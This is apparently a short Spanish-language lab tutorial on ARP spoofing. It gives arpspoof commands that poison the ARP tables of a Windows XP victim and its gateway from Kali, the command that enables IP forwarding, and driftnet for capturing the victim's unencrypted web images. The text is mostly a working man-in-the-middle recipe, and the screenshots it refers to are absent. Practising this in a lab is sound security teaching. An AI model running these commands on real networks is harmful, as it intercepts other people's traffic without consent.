ARP Spoofing

Borrar tabla arp

arp -d

Ver tabla arp

arp -a

 

En Windows ejecutar:

arp -a

ping www.google.es -n 200  //lanzaremos el ping 200 veces para que nos de tiempo en la Kali a ejecutar el arpspoof

En Kali ejecutar:

setxkbmap es  –> para poner teclado en Español

arpspoof -i eth0 -t 192.168.126.133 192.168.126.2 

arpspoof -i eth0 -t 192.168.126.2 192.168.126.133

Los dos anteriores comandos se pueden reducir en una sola línea

arpspoof -i eth0 -t 192.168.126.133 192.168.126.2 -r   //La “r” sería de reverese

En cuanto lancemos la orden el la Kali podremos observar lo siguiente.

cat /proc/sys/net/ipv4/ip_forward

echo 1 > /proc/sys/net/ipv4/ip_forward

Tras ejecutar en la Kali los dos comandos anteriores podremos observar en el XP lo siguiente.

driftnet  -i eth0 //Para comprobar este comando, la máquina XP tendrá que navegar sobre una página web sin cifrar, es decir, un http

Dejar un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *